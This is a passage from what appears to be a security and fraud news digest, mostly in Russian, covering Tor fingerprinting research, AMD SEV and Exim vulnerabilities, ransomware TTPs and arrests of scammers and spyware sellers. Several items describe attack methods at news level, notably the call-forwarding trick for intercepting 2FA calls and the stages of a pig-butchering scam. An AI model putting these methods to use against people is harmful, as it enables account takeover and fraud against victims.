themselves are not anonymous with respect to their entry relays, because the
traffic is encrypted and the requests jump through multiple hops, the entry
relays cannot identify the clients' destination, just as the exit nodes cannot
discern a client for the same reason.

Website fingerprinting attacks on Tor aim to break these anonymity protections
and enable an adversary observing the encrypted traffic patterns between a
victim and the Tor network to predict the website visited by the victim. The
threat model devised by the academics presupposes an attacker running an exit
node — so as to capture the diversity of traffic generated by real users —
which is then used as a source to collect Tor traffic traces and devise a
machine-learning-based classification model atop the gathered information to
infer users' website visits.
The adversary model involves an "online training phase that uses observations of genuine Tor traffic collected from an exit relay (or relays) to continuously update the classification model over time," explained the researchers, who ran entry and exit relays for a week in July 2020 using a custom version of Tor v0.4.3.5 to extract the relevant exit information.
To mitigate any ethical and privacy concerns arising out of the study, the paper's authors stressed the safety precautions incorporated to prevent leakage of sensitive websites that users may visit via the Tor browser.
"The results of our real-world evaluation demonstrate that WF attacks can only be successful in the wild if the adversary aims to identify websites within a small set," the researchers concluded. "In other words, untargetted adversaries that aim to generally monitor users' website visits will fail, but focused adversaries that target one particular client configuration and website may succeed."
[https://thehackernews.com/2021/11/researchers-demonstrate- new.html](https://thehackernews.com/2021/11/researchers-demonstrate- new.html)
(Secure Encrypted Virtualization) protection technology.
Chipmaker AMD has issued guidance for two attacks ([CVE-2020-12967](https://cve.mitre.org/cgi- bin/cvename.cgi?name=CVE-2020-12967), [CVE-2021-26311](https://cve.mitre.org/cgi- bin/cvename.cgi?name=CVE-2021-26311)) that allow bypassing the SEV (Secure Encrypted Virtualization) technology implemented to prevent rogue operating systems on virtual machines.
The chipmaker is aware of two research papers, respectively titled “[SEVerity: Code Injection Attacks against Encrypted Virtual Machines](https://www.sec.in.tum.de/i20/student-work/code-execution-attacks- against-encrypted-virtual-machines)” and “[undeSErVed trust: Exploiting Permutation-Agnostic Remote Attestation](https://uzl-its.github.io/undeserved- trust/),” related to the two attacks above. The findings about the two attacks will be presented by two research teams at this year’s 15th IEEE Workshop on Offensive Technologies (WOOT’21).
AMD Secure Encrypted Virtualization (SEV) isolates virtual machines and the hypervisor, but the two attacks can allow threat actors to inject arbitrary code into the virtual machine even if the protection mechanism is in place.
The first flaw, tracked as [CVE-2020-12967](https://cve.mitre.org/cgi- bin/cvename.cgi?name=CVE-2020-12967), is caused by the lack of nested page table protection in the AMD SEV/SEV-ES feature which could potentially lead to arbitrary code execution within the guest VM if a malicious administrator has access to compromise the server hypervisor.
The second vulnerability, tracked as [CVE-2021-26311](https://cve.mitre.org/cgi- bin/cvename.cgi?name=CVE-2021-26311), resides in the AMD SEV/SEV-ES feature. According to the security advisory, the memory can be rearranged in the guest address space that is not detected by the attestation mechanism which could be used by a malicious hypervisor to potentially lead to arbitrary code execution within the guest VM if a malicious administrator has access to compromise the server hypervisor.
The vulnerabilities impact all AMD EPYC processors, 1st/2nd/3rd Gen AMD EPYC™ Processors and AMD EPYC™ Embedded Processors.
The vendor has provided mitigation in the SEV-SNP feature which is available for enablement in 3rd Gen AMD EPYC™ processors. Customers could mitigate the attacks by enabling SEV-SNP, which is only supported on 3rd Gen AMD EPYC™.
Customers using prior generations of EPYC processors, which do not support SEV-SNP, should follow [security best practices](https://www.amd.com/system/files/TechDocs/SEV-SNP-strengthening-vm- isolation-with-integrity-protection-and-more.pdf).
The vendor published the following acknowledgement:
Follow me on Twitter:
@securityaffairs and
Facebook
**
(SecurityAffairs–** hacking,
AMD)
Paganini](https://securityaffairs.co/wordpress/author/paganinip)
Pierluigi Paganini is member of the ENISA (European Union Agency for Network and Information Security) Threat Landscape Stakeholder Group and Cyber G7 Group, he is also a Security Evangelist, Security Analyst and Freelance Writer. Editor-in-Chief at "Cyber Defense Magazine", Pierluigi is a cyber security expert with over 20 years experience in the field, he is Certified Ethical Hacker at EC Council in London. The passion for writing and a strong belief that security is founded on sharing and awareness led Pierluigi to find the security blog "Security Affairs" recently named a Top National Security Resource for US. Pierluigi is a member of the "The Hacker News" team and he is a writer for some major publications in the field such as Cyber War Zone, ICTTF, Infosec Island, Infosec Institute, The Hacker News Magazine and for many other Security magazines. Author of the Books "The Deep Dark Web" and “Digital Virtual Currency and Bitcoin”.
Группа Intrusion Truth обнаружила истоки сотрудничества подозреваемых хакеров и псевдоним, который использовался на китайском хакерском форуме.
Группа анонимных исследователей безопасности, называющая себя Intrusion Truth, опубликовала результаты расследования подставных компаний Chengdu Shirun, Chengdu Xinglan и Chengdu Xinglan, предположительно управляемых двумя гражданами Китая, которым в прошлом году США предъявило обвинение.
Опубликованные данные проливают свет на растущую тенденцию иностранных спецслужб использовать подставные компании для сокрытия своих хакерских операций. Как сообщили в Министерстве юстиции США, двое подозреваемых, Ли Сяоюй и Дун Цзячжи, на протяжении десяти лет занимались злонамеренной киберактивностью, иногда для личной финансовой выгоды, а иногда по поручению Министерства государственной безопасности КНР. В некоторых случаях подозреваемые якобы проникали в сети американских фирм, работающих над созданием вакцины от коронавируса. Прокуратура США обвинила мужчин в краже коммерческих тайн и других данных на сотни миллионов долларов.
Intrusion Truth обнаружила истоки сотрудничества Ли и Дуна и псевдоним, который Ли использовал на китайском хакерском форуме. Двое мужчин якобы повторно использовали адреса электронной почты и номера телефонов при регистрации подставных компаний, что помогло отследить их деятельность.
Как сообщается в обвинительном заключении США в отношении Ли и Донга в 2020 году, один из мужчин эксплуатировал уязвимости в программном обеспечении Adobe ColdFusion для проникновения в сети жертв. С помощью одного из псевдонимов Ли (Oro0lxy) Intrusion Truth обнаружила доказательства того, что мужчина был назначен модератором web-сайта разработчиков ColdFusion девять лет назад.
В агенте пересылки сообщений Exim обнаружили ряд критических багов, которые позволяют выполнить произвольный код и получить root-привилегии. Инженеры компании Qualys, нашедшие эти проблемы, дали уязвимостям общее название 21Nails.
Как нетрудно догадаться по названию, суммарно в «набор» 21Nails включена 21 уязвимость. Перед этими багами уязвимы все версии Exim, выпущенные за последние 17 лет (с 2004 года), вплоть до версии 4.94.2. Одиннадцать из этих проблем требуют локального доступа к уязвимому серверу, а еще десять ошибок можно использовать удаленно.
Исследователи настоятельно рекомендуют владельцам серверов как можно скорее обновить Exim до новейшей версии 4.94.2, где опасные проблемы были устранены. Хотя аналитики не стали обнародовать готовые эксплоиты для всех ошибок 21Nails, они отмечают, что преступники, скорее всего, смогут создать их самостоятельно, так как уязвимости уже описаны достаточно подробно.
В настоящее время в сети можно обнаружить 3,5-3,8 млн уязвимых серверов Exim (по статистике Shodan и BinaryEdge). И стоит отметить, что ранее уязвимости в Exim уже становились объектами пристального интереса хакеров. К примеру, в последние годы злоумышленники активно эксплуатировали проблему CVE-2019-10149, а также злоупотребляли уязвимостями CVE-2019-15846 и CVE-2018-6789.
Источник: xakep.ru/2021/05/06/21nails/
раз быстрее быстрейшего суперкомпьютера
Сегодня ночью в своем блоге Google [объявила](https://blog.google/technology/research/google-willow-quantum- chip/) "https://blog.google/technology/research/google-willow-quantum-chip/" о том, что выпускает свой новый лучший квантовый чип Willow. И этот чип (приготовьтесь) в септилион раз быстрее самого быстрого из существующих сегодня суперкомпьютера: он всего за 300 секунд выполнил вычислительную задачу, на которую у "соперника" бы ушло 10,000,000,000,000,000,000,000,000 лет. Только представьте, что это значит для того же машинного обучения и ИИ! К тому же, это первый в истории случай, когда у кого-то получилось создать логические кубиты, перформящие ниже границы Quantum Error Correction.
QEC – это метод, при котором данные сохраняются путем распределения информации
по нескольким кубитам: несколько физических кубитов используются для
представления одного логического. Дело в том, что обычно ошибки вычислений –
ключевая проблема квантовых машин. Кубиты (единицы вычисления в квантовых
компьютерах) слишком быстро обмениваются информацией и имеют тенденцию терять
ее. Обычно чем больше кубитов вы используете, тем больше ошибок возникает, и
квантовая система вырождается в классическую.
Но в Willow все наоборот: исследователи показали, что чем больше кубитов используется, тем меньше ошибок. При этом их количество не просто уменьшается, а сокращается экспоненциально! Эту задачу человечество пыталось решить последние 30 лет, с того момента, как QEC была представлена Питером Шором в 1995 году. Такой результат улучшает всю систему в целом: например, срок жизни кубитов в Willow кратно увеличился относительно предшественников (~ в 5 раз).
Всего у чипа, кстати, 105 кубитов. Конечно, это все еще мало (например, чтобы
взломать биткоин, потребуется где-то 300-400 миллионов кубитов), но по
сравнению с предыдущими квантовыми компьютерами – достаточно мощно. В Google
говорят, что могли бы добавить и больше, но пока работают на качество, а не на
количество.
Компания планирует и дальше улучшать свои квантовые чипы. Первый из них Google представили еще в 2019 году, и сегодня, после такого исторического анонса, надеятся, что "дальше квантовые вычисления будут совершенствоваться с двойной экспоненциальной скоростью ".
Полицейские из Петербурга задержали в Москве и Московской области банду фальшивых криптоинвесторов. Молодые люди развели десятки россиян на деньги, активно продвигая в интернете рекламу «авторского» курса, который якобы поможет зарабатывать огромные суммы на криптобирже. Об этом сообщила официальный представитель МВД России Ирина Волк.
- В действительности никакими специальными познаниями в криптоинвестициях молодые люди не обладали, а огромное количество подписчиков и положительных отзывов было результатом использования интернет-ботов, - добавила она.
Кроме того, молодые люди для создания видимости успешной работы использовали биржевые симуляторы. С помощью них клиентов вводили в заблуждение, что инвестированные средства якобы приносят доход. На деле же все вложенные ими деньги «криптоинвесторы» похищали.
Полицейские провели ряд обысков по местам проживания подозреваемых, в ходе которых изъяли 18 банковских карт, несколько сим-карт и смартфонов. Было возбуждено уголовное дело по факту мошенничества. Подозреваемых заключили под стражу.
Уязвимость в функции переадресации вызовов позволяет хакерам перехватывать телефонные звонки и коды двухфакторной аутентификации (2FA) с минимальным взаимодействием с жертвой. Об этом сообщает безопасный исследователь Джеймисон Винсенти О’Райли [в интервью](https://www.404media.co/how-hackers-can- hijack-2fa-calls-with-sneaky-call-forwarding/) изданию 404 Media.
Механизм атаки заключается в обмане пользователя, заставляя его набирать определённый телефонный номер посредством мошеннической ссылки с префиксом «tel://», при нажатии на которые будет набираться номер, указанный после слэша.
После клика по ссылке и нажатия кнопки, телефон самостоятельно начинает набор номера, после чего автоматизированный голос сообщает о переадресации звонков. При этом нет механизма аутентификации, гарантирующего, что жертва действительно хочет настроить переадресацию вызовов.
Скриншот фишинговой страницы. После нажатия на кнопку совершается звонок
Исследователь подчеркивает серьезность угрозы, указывая на возможность перехвата не только звонков, но и голосовых сообщений с кодами двухфакторной аутентификации, что делает данную уязвимость привлекательной для киберпреступников. Примером может служить возможность перехвата кода аутентификации от Gmail, которые иногда передаются голосом.
По словам представителя Google, компания ограничивает использование звонков в двухфакторной аутентификации только для номеров, указанных пользователем, и рекомендует с осторожностью относиться к сообщениям и ссылкам от неизвестных отправителей.
В видео О'Рейли объясняет, что злоумышленник может позвонить жертве, выдавая себя за агента техподдержки клиентов, представителя телекоммуникационной компании или знакомого жертвы (подделав номер). Чтобы перехватить телефонные звонки жертвы, мошенник отправляет жертве специально созданное SMS-сообщение с просьбой перезвонить.
Среди рекомендаций для устранения угрозы исследователь предлагает введение дополнительной аутентификации, например, через PIN-коды, которые известны только владельцу номера. В ответ на возникшую проблему, Verizon, один из операторов, чьи абоненты столкнулись с проблемой, выразил серьёзное отношение к вопросам безопасности и конфиденциальности данных, заверив, что примет соответствующие меры для устранения недочёта.
В ЮАР зафиксирован резкий рост случаев банковского онлайн-мошенничества, а также физических взломов банкоматов.
«Южная Африка столкнулась с огромным ростом финансовых и банковских преступлений, включая контактные и цифровые преступления, мошенничество с использованием банковских приложений и пластика. Эта преступная деятельность бросает тень на экономику, общество и даже правительство страны», — говорится в официальном сообщении организации.
Среди ключевых показателей по итогам 2022 года бросается в глаза 36-процентный рост количества преступлений, так или иначе связанных с онлайн-банкингом. Мошенники использовали ряд тактик, включая социальную инженерию и вишинг, чтобы обманом заставлять жертв раскрывать конфиденциальную информацию. Потерь от этого вида киберпреступности стало на девять процентов больше, чем годом ранее.
По ряду направлений наблюдается определенное снижение показателей. Например, в ЮАР стало на четверть меньше случаев, связанных с подменой сим-карт, а общий показатель преступности для банковского мошенничества, связанного с непосредственно с карточками, стал ниже на 18,4 процента. Также южноафриканцев стали значительно реже грабить у банкоматов (на 39 процентов).
Тем не менее местные силовики фиксируют удручающую статистику в части взрывов банкоматов с последующим извлечением наличности. Таких инцидентов в 2022 году стало на 23 процента больше. Вкупе со снижением активности по ряду видов онлайн-мошенничества, это позволяет констатировать, что преступникам в ЮАР порой проще физически повредить банкомат, чем обрабатывать держателей карточек.
source: mybroadband.co.za/news/security/510222-alarming-spike-in-digital- banking-fraud-and-atm-bombings-in-south-africa.html
Citizens Bank, один из крупнейших региональных банков США, выплатит гражданский штраф в размере 9 миллионов долларов для урегулирования обвинений в неправильном управлении спорами клиентов по кредитным картам и исками о мошенничестве, сообщило Бюро финансовой защиты потребителей во вторник.
Регулятор обвинил подразделение Citizens Financial Group Inc в нарушении федерального закона о правде в кредитовании, заставляя клиентов "перепрыгивать через ненужные и обременительные препятствия" для устранения ошибок в выставлении счетов и заявлений о несанкционированном использовании карты.
Citizens Bank также обвинили в том, что он не подтвердил получение уведомлений об ошибках выставления счетов, а в некоторых случаях ему было отказано, или не раскрыл необходимую информацию о кредитных консультациях клиентам по бесплатному номеру.
Банк не признал и не отрицал нарушения, согласившись на урегулирование.
Урегулирование во вторник разрешает иск CFPB, поданный в январе 2020 года, и требует одобрения федерального судьи в Провиденсе, штат Род-Айленд, где базируется Citizens.
Банк согласился улучшить свою практику использования кредитных карт, в том числе путем предоставления возмещения по обоснованным претензиям и не требовать от клиентов с жалобами подписывать аффидевиты о мошенничестве.
Citizens завершил март с активами в 222,3 миллиарда долларов. Он управляет около 1100 филиалами и 3400 банкоматами в 14 штатах США и Вашингтоне, округ Колумбия.
В заявлении банка говорится, что в 2015 году были выявлены ошибки, которые затронули "очень небольшую группу" клиентов карт, которые были исправлены.
"Хотя Citizens по-прежнему не согласны с позицией CFPB, - заявила главный юрисконсульт Полли Клэйн, - мы рады оставить этот вопрос позади".
(Репортаж Джонатана Стемпела из Нью-Йорка, редактирование Ника Земински)
source: msn.com/en-ca/money/topstories/citizens-bank-to-pay-9-million-penalty-
over-credit-card-practices-us-regulator/ar-AA1bzOph
Злоумышленники работали не только на Украине, но и в нескольких странах Европы.
Киберполиция Украины и Европол обнаружили, а затем арестовали пять главарей международной мошеннической сети, которая наносила ущерб на сумму более 200 миллионов евро в год. Злоумышленники работали не только на территории Украины, но и в Германии, Испании, Латвии, Финляндии и Албании.
Основой сети были колл-центры и офисы в разных странах. С их помощью мошенники обманом заставляли потенциальных инвесторов вкладывать деньги в несуществующие проекты.
Для продвижения своей мошеннической схемы злоумышленники создали сеть фейковых веб-сайтов, выдающих себя за криптовалютные, фондовые, облигационные, фьючерсные и опционные инвестиционные порталы. Затем в ход шла схема под названием The Pig-Butchering Scam (Разделка свиньи). Работает она так:
Мошенники связываются с жертвами («свиньями») в соцсетях и входят в доверие в процессе продолжительной переписки, предлагая дружбу или романтическое общение. Иногда мошенники выдают себя за настоящих друзей жертвы;
В какой-то момент переписки мошенники предлагают жертве инвестировать в криптовалюту на поддельных платформах. Как правило, на таких сервисах показаны огромные прибыли и обещания больших процентов. Главная цель этих мошеннических сайтов состоит в том, чтобы заставить жертву инвестировать постоянно растущие суммы и ничего не снимать.
Когда жертва пытается обналичить свои инвестиции, сайт требует, чтобы пользователь сначала заплатил подоходный налог, дополнительные сборы за обработку, международные транзакционные издержки и т. д.
В итоге, мошенник прекращает общение и закрывает фальшивую криптобиржу, или жертва сдается, осознав, что ее обманули. Мошенничество может длиться месяцами, когда жертва уже отдает мошенникам огромные суммы средств, от тысяч до миллионов долларов.
Согласно заявлению украинской киберполиции, преступники наняли более 2 000 человек на работу в колл-центрах. Их задачей было привлечение жертв на мошеннические сайты.
В ходе операции сотрудники правоохранительных органов провели обыски в домах пяти арестованных, а также по адресам колл-центров в Киеве и Ивано-Франковске. Было изъято более 500 единиц компьютерного оборудования и мобильных телефонов.
Пойманным злоумышленникам теперь будут предъявлены обвинения в мошенничестве, часть 3 статьи 190 Уголовного кодекса Украины, которая предусматривает наказание до восьми лет лишения свободы.
«Лаборатория Касперского» провела анализ самых популярных тактик, техник и процедур (TTPs) восьми самых активных групп, распространяющих программы- вымогатели. Исследование показало, что различные семейства таких вредоносов совпадают более чем на половину в своих TTPs на протяжении всех этапов цепочки атак.
В отчёте представлены данные об активности Conti/Ryuk, Pysa, Clop (TA505), Hive, Lockbit2.0, RagnarLocker, BlackByte и BlackCat. Эти группы ведут свою деятельность по всему миру, втом числе в США, Великобритании, Германии. Смарта 2021-го по март 2022 года операторы этих групп пытались атаковать более 500 организаций вразных отраслях, среди которых промышленность, разработка софта, строительство.
Исследование рассказывает обо всех этапах атаки, излюбленных TTPs злоумышленников и преследуемых ими целях, а также о методах защиты от целевых атак операторов шифровальщиков. Также он включает правила обнаружения SIGMA, которые могут использовать специалисты SOC.
Проанализировав, какие техники и тактики, собранные в MITRE ATT&CK, применяют известные группы, эксперты нашли много сходства среди TTPs на протяжении всех этапов цепочки Cyber Kill Chain. Сходство между атаками прослеживается в следующем:
В первую очередь отчёт будет интересен аналитикам SOC, командам по активному
поиску угроз (Threat Hunting), аналитикам киберугроз (Сyber Threat
Intelligence), специалистам по цифровой криминалистике и
реагированию на инциденты (Digital Forensics and Incident Response).
source: securelist.com/modern-ransomware-groups-ttps/106824
Из России экстрадирован гражданин Украины Николай Махницкий, имеющий также гражданство Чехии с именем Юмжар Водан. Он был объявлен в международный розыск по каналам Интерпола по обвинению в мошенничестве.
По имеющейся информации, обвиняемый был признан виновным муниципальным судом Праги в 2010 году и приговорен к восьми годам лишения свободы.
Махницкий скрылся от правосудия, однако в 12 июня 2021 года был задержан в Брянской области при попытке въехать на территорию Российской Федерации. Сегодня в пункте пропуска «Лудонка-Виентули» обвиняемый передан представителям компетентных органов Чешской Республики.
source: mvdmedia.ru/news/operativnye-novosti/iz-rossii-ekstradirovan- ukrainets-osuzhdennyy-za-moshennichestvo-na-territorii-cheshskoy-respubliki
Жительница Березовского района стала жертвой мошенника, который выманил у нее крупную сумму денег, сообщает Telegram-канал Следственного комитета.
По данным следствия, в январе этого года 69-летняя пенсионерка познакомилась на одном из сайтов с мужчиной, который представился военным врачом из Сирии. В ходе переписки "военврач" признался женщине в возникшей симпатии и готовности приехать в Беларусь, чтобы жениться на ней. Но для расторжения контракта он якобы должен выплатить своему работодателю компенсацию.
Мошенник убедил доверчивую женщину перевести на его счет деньги, обещая при встрече возместить все ее расходы. В общей сложности потерпевшая перечислила "жениху" более Br24 тыс. Вскоре она поняла, что никакого военного врача не существует, и обратилась в правоохранительные органы.
Березовский РОСК возбудил уголовное дело по ч.3 ст.209 (мошенничество, совершенное в крупном размере) УК.
Издание Bleeping Computer рассказало о баге в Windows Defender, внимание на который обратили пользователи Windows 10. Оказалось, что защитное ПО создает тысячи мелких файлов, которые занимают гигабайты дискового пространства в Windows 10.
Ошибка закралась в код Windows Defender в версии 1.1.18100.5, и она приводит к тому, что папка C:\ProgramData\Microsoft\Windows Defender\Scans\History\Store заполняется тысячами файлов с именами, которые выглядят как хэши MD5.
[](https://xakep.ru/wp- content/uploads/2021/05/347690/folder-of-files.jpg)
Как правило, размер этих файлов варьируется в диапазоне от 600 байт до 1 Кб.
[](https://xakep.ru/wp- content/uploads/2021/05/347690/file-properties.jpg)
Хотя в системах журналистов «вес» упомянутой папки не превышал 1 Мб, некоторые пользователи [жалуются](http://docs.microsoft.com/en- us/answers/questions/376490/windows-defender-issue-on-server-lots-of-files- bei.html), что в их случае Windows Defender создал сотни тысяч мелких и бесполезных файлов, которые порой занимали до 30 Гб дискового пространства (для небольших SSD это может стать проблемой).
По данным СМИ, в настоящее время эта ошибка уже устранена: патч вошел в состав Windows Defender версии 1.1.18100.6.
Источник: xakep.ru/2021/05/06/defender-bug/
Согласно давно продуманному производителями плану, с наступлением 2021 года поддержка Adobe Flash Player была окончательно прекращена. Это значит, что компания Adobe официально прекратила распространение Flash Player и его обновление, а разработчики браузеров перестали поддерживать плагины Flash. Кроме того, в код Flash Player заранее внедрили аварийный «рубильник», который предотвращает запуск любого Flash-контента, начиная с 12 января 2021 года.
В прошлом году, готовясь к окончательному прекращению поддержки Flash Player, компания Microsoft создала обновление KB4577586, предназначенное для удаления Adobe Flash из всех версий Windows 8, 10 и Windows Server, а также предотвращения его повторной установки.
Тогда обновление было доступно только через официальный каталог, и его нельзя было удалить после установки. Впрочем, обновление не являлось обязательным, хотя в феврале его принудительно развернули на некоторых машинах под управлением Windows 10.
В целом в компании обещали, что в начале 2021 года это обновление распространят через WSUS и Windows Update и сделают обязательным. Теперь в блоге Microsoft появилось сообщение, в котором раскрываются дальнейшие планы, относительно KB4577586.
С июня 2021 года Microsoft планирует включить KB4577586 в состав опциональных накопительных preview-обновлений для Windows 10 для Windows 10 1809 и более поздних версий. В июле KB4577586 войдет уже в обязательные пакеты накопительных обновлений для Windows 10 1507 и более поздних версий, а также в Windows Server 2012, Windows 8.1 и Windows Embedded 8 Standard.
Также стало известно, что в Windows 21H1, preview-версия которой станет общедоступной уже в этом месяце, обновление KB4577586 будет устанавливаться автоматически, то есть плагин Adobe Flash Player будет автоматически удален.
Вряд ли окончательное удаление Flash Player будет замечено пользователями, ведь уже сейчас он фактически бесполезен и не может использоваться для отображения контента.
Источник: xakep.ru/2021/05/05/kb4577586-mandatory/
Студент КГУ стал фигурантом уголовного дела.
По информации пресс-службы регионального УМВД, молодой человек еще с начала обучения в вузе интересовался хакерскими программами. Он хотел получить доступ к чужим ПК, чтобы собрать данные о кодах и паролях.
Осенью прошлого года он нашел в даркнете похожее приложение, но с ограниченным функционалом. Костромской хакер обратился к своим коллегам-программистам и прислал им код программы. Но ему не стали помогать.
“В отношении юного хакера следователями было возбуждено уголовное дело по признакам преступления, предусмотренного ч.1 ст. 273 УК РФ. В рамках расследования был проведен комплекс сложных технических экспертиз, собрана доказательная база, указывающая на факт неправомерного использования и пересылки вредоносного ПО”,
Click to expand...
Сам студент сказал, что полностью потерял интерес к хакерским программам и взломам данных. Ему может грозить до 4 лет лишения свободы.
Трое фигурантов звонили гражданам, выспрашивали у них конфиденциальную информацию о финансовом номере и осуществляли перевыпуск SIM-карт, чтобы завладеть деньгами жертв. Обвинительный акт направлен в суд, им грозит до 15-ти лет заключения.
В августе 2023 года киберполицейские Днепропетровщины совместно со следователями ГУНП в области под процессуальным руководством Днепропетровской областной прокуратуры задокументировали факты мошенничества, которым занимались трое жителей Кривого Рога.
Участники организованной группы получали информацию о финансовых номерах граждан. Используя конфиденциальные данные, аферисты осуществляли несанкционированный доступ к SIM-картам путем их перевыпуска и дублирования.
В дальнейшем мошенники без ведома владельцев осуществляли перевод денег на подконтрольные банковские счета. Для этого использовали уникальный номер- пароль клиентов банка, который является средством идентификации перевода.
Полицейские в прошлом году провели шесть обысков и изъяли доказательства противоправной деятельности фигурантов. По результатам проведенных обысков организатор, соорганизатор и исполнитель были задержаны. Следователи объявили им подозрение.
В ходе расследования оперативники киберполиции установили, что обвиняемые, используя незаконно добытые финансовые сведения граждан, также оформляли онлайн-кредиты от имени жертв. Выплаты же злоумышленники получали на подконтрольные счета.
Следователи установили 10 потерпевших, среди которых физические и юридические лица. Общая сумма нанесенного ущерба превышает полмиллиона гривен.
Сейчас правоохранители завершили расследование и направили в суд обвинительный акт по ч. 2, 3 ст. 27, ч. 3 ст. 28, ч. 1 ст. 182 (Нарушение неприкосновенности частной жизни), ч. 5 ст. 185 (Кража), ч. 4 ст. 190 (в редакции 28.04.2023), ч. 5 ст. 190 (Мошенничество), ч. 5 ст. 361 Уголовного Кодекса Украины. Злоумышленникам грозит до пятнадцати лет лишения свободы.
Разоблачению злоумышленников способствовали сотрудники службы безопасности и АО «Sense Bank».
Главным управлением цифрового развития предварительного следствия Следственного комитета совместно с ГУПК КМ МВД проведена операция по пресечению деятельности очередного «дроповода».
Установлено, что летом прошлого года 19-летний житель Барановичей в одной из социальных сетей разместил объявление о поиске заработка. Спустя непродолжительное время в мессенджере ему написал неизвестный, который предложил за деньги зарегистрировать аккаунт в интернет-банкинге одного из белорусских банков и переслать ему реквизиты доступа к счету.
После успешной продажи оформленного аккаунта молодой человек организовал на постоянной основе регистрацию таких счетов на имя более 50 жителей Барановичей, реквизиты которых в последующем реализовывались. При этом некоторые из них за материальное вознаграждение оказывали содействие подозреваемому и подыскивали для него новых «дропов». Данные банковские счета в последующем использовались в преступной деятельности.
За каждую сделку «дроповод» получал денежные средства в размере от 70 до 100 рублей, а сами «дропы» – от 15 до 70 рублей.
В ходе операции, проведенной на территории Брестской и Гродненской областей, по местам регистрации и жительства подозреваемого и его пособников проведены обыски, изъяты и осмотрены находившиеся в их пользовании мобильные устройства и компьютерная техника.
В ходе допросов подозреваемый и его пособники подробно рассказали о своем незаконном заработке, раскаялись в содеянном.
Следственным комитетом возбуждены уголовные дела по статье 222 (незаконный оборот средств платежа и (или) инструментов) Уголовного кодекса Республики Беларусь.
Справочно: Санкция статьи предусматривает наказание до 10 лет лишения свободы.
Пастор из Колорадо Эли Регаладо, основавший криптовалютный проект INDXcoin, публично признался в мошенничестве и присвоении $1,3 млн, чтобы реконструировать на эти деньги свой дом.
Духовный наставник Эли Регаладо (Eli Regalado) разместил на веб-сайте INDXcoin видео продолжительностью 9 минут, в котором подтвердил обвинения со стороны Комиссии по ценным бумагам штата Колорадо. 18 января регулятор обвинил основателей этой криптовалютной схемы в распространении и продвижении токена INDXcoin, который был признан мошенническим.
INDXcoin был размещен на криптовалютной платформе Kingdom Wealth Exchange (KWE), которая также находилась под контролем Регаладо. С середины 2022 года по начало 2023 года в INDXcoin было вложено около $3,2 млн от более 300 инвесторов. Большинство вкладчиков были из Церкви победоносной благодати (Victorious Grace Church), где Регаладо служит пастором. Комиссар Тун Чан (Tung Chan) заявил, что Регаладо воспользовался доверием христианской общины в Денвере, обещая им «золотые горы», и присвоил деньги с его партнершей Кэйтлин Регаладо (Kaitlin Regalado).
1 ноября Kingdom Wealth Exchange прекратила свое существование из-за нехватки средств для обслуживания внутренних серверов. Тем не менее, Регаладо призвал держателей INDXcoin воздержаться от их продажи и не гнаться за богатством. Пастор не стал отрицать обвинения Комиссии.
«Господь повелел мне продать криптовалюту без какой-либо четкой стратегии и потратить часть доходов на реконструкцию дома. Это было послание от Высших Сил. Нас обвиняют в продаже криптовалюты на миллионы долларов, которую государство считает бесполезной. Мы запустили платформу, технология дала сбой, и дела пошли под откос. Поэтому мы просто ждали чуда», — сказал священник.
Напомним, что в прошлом году создательница Реформатской Церкви Сатаны была осуждена за нелегальный обмен биткоинов на сумму более $3 млн. Ранее первая пресвитерианская церковь Майами объявила, что будет принимать пожертвования в криптовалюте DOGE.
• Source: https://community.indxcoin.com/c/indxcoin-updates/lawsuit-response
Житель Ижевска получил значительный штраф за незаконное списание денежных средств с банковской карты. Об этом сообщает пресс-служба прокуратуры Удмуртской Республики.
Житель Ижевска получил значительный штраф за незаконное списание денежных
средств с банковской карты. Об этом сообщает пресс-служба прокуратуры
Удмуртской Республики.
Ленинский районный суд столицы региона вынес приговор по делу 23-летнего
парня, который был признан виновным в совершении преступления по статье 158
Уголовного кодекса РФ «Кража, совершенная с банковского счета». В ходе
судебного процесса было установлено, что в апреле 2022 года обвиняемый,
являясь членом преступной группы, используя интернет, отправил фишинговую
страницу жительнице Республики Коми.
Женщина, чтобы завершить покупку, перешла по ссылке, после чего лишилась 6 тысяч рублей со своего банковского счета. Обвиняемый полностью возместил ущерб, но несмотря на это, суд назначил ему штраф в размере 100 тысяч рублей. Приговор пока не вступил в законную силу.
Службы безопасности Украины пресекли деятельность хакера, который за деньги устанавливал шпионские программы и получал доступ к частным компьютерным системам.
Злоумышленником оказался 46-летний программист из Киева.
В течение года он скрытно устанавливал «вирусы» на компьютерные устройства.
Уровень технической подготовки и практические навыки позволяли ему «шпионить» как физически, так и через сеть Интернет. Особенно уязвимыми были те электронные устройства, владельцы которых пользовались нелицензионным программным обеспечением.
Хакер находил «клиентов» на отечественных онлайн-сервисах поиска специалистов
для решения бытовых и бизнес задач.
Кроме услуг программиста, злоумышленник предоставлял заказчикам возможность
установить на чужие компьютеры вредоносное программное обеспечение.
Стоимость противоправной услуги зависела от срочности и вида электронной техники, которую надо было «заразить».
Шпионские программы работали в фоновом режиме и предоставляли посторонним
лицам удаленный доступ к «зараженным» устройствам.
Заказчики скрыто могли вмешиваться в частную и деловую жизнь граждан и
организаций.
Также они:
- получали полный доступ к содержимому файлов;
- читали переписку в мессенджерах и социальных сетях;
- отслеживали историю веб-браузера;
- просматривали установленные программы;
- управляли камерой, осуществляя фото- и видеозаписи.
Правоохранители задокументировали систематические факты установления злоумышленником вредоносного программного обеспечения на компьютерные устройства.
Проведенные экспертизы подтвердили, что установленные злоумышленником «вирусы»
являются вредоносным программным обеспечением.
Во время следственных действий по месту жительства фигуранта изъята
компьютерная и мобильная техника, а также флэш-носители с образцами шпионских
программ.
Сейчас инженеру-программисту объявлено о подозрении в совершении преступления, предусмотренного ч. 2 ст. 361-1 (создание с целью противоправного использования, распространения или сбыта вредоносных программных или технических средств, а также их распространение или сбыт) Уголовного кодекса Украины.
Санкция статьи предусматривает наказание в виде лишения свободы на срок до 5 лет.
Мероприятия по документированию и пресечению противоправных действий проводили сотрудники ГУ СБУ в г. Киеве и Киевской области совместно с ГСУ Национальной полиции при процессуальном руководстве Офиса Генерального прокурора Украины.
Досудебное расследование продолжается.
Полиция американского Бруклин-Сентер (штат Миннесота) расследует дело группы из трех кардеров, которым удалось украсть сотни тысяч долларов. По данным KCTP-TV, для этого они использовали поддельные кредитки и удостоверения личности других людей.
Детали схемы не разглашаются, однако уже понятно, что добычей кардеров стали достаточно серьезные суммы денег. Их троица потратила на оплату аренды недвижимости, ювелирные украшения, трехколесный мотоцикл Polaris Slingshot, а также квадроциклы.
